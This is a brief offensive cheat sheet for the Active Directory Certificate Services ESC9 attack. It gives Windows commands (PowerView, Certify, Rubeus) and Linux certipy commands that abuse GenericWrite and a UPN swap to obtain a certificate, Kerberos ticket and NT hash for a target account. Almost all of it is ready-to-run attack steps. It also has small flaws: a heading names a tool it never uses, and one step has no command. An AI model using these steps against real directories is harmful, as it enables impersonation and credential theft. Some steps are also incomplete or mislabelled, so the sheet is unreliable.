ESC9
To exploit ESC9, ensure the StrongCertificateBindingEnforcement
key is not set to 2
or includes the UPN flag, the template has CT_FLAG_NO_SECURITY_EXTENSION
, specifies client authentication, and the attacker has GenericWrite
privilege on account A to compromise account B.
Windows
User's Password Reset
PS /home/bobbuilder> Set-DomainUserPassword -Identity <account_name> -AccountPassword $((ConvertTo-SecureString <new_password> -AsPlainText -Force))
Change the user UPN to the target's UPN
PS /home/bobbuilder> Set-DomainObject <account_name> -Set @{'userPrincipalName'='<target_name>@minions.com'} -Verbose
Request as the user
PS /home/bobbuilder> .\Certify.exe request /ca:<ca> /template:<template_name> /altname:<target_name>
Convert certificate to PFX
Retrieving the TGT of the victim
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:<target_name> /certificate:<target_name>.pfx /getcredentials /nowrap
Linux (Using Impacket's dackedit.py)
Get the NT hash of a user
bob$ certipy shadow auto -u user1@minions.com -p 'password1' -account <account_name>
Change the user UPN to the target's UPN
bob$ certipy account update -u user1@minions.com -p 'password1' -user <account_name> -upn <target_name>
Request as the user
bob$ certipy req <account_name> -hashes <account_hash> -ca <ca_name> -template <template_name>
Revert changes of the user
bob$ certipy account update -u user1@minions.com -p 'password1' -user <account_name> -upn <account_name>@minions.com
Authenticate as the target
bob$ certipy auth -pfx <target_name>.pfx -domain minions.com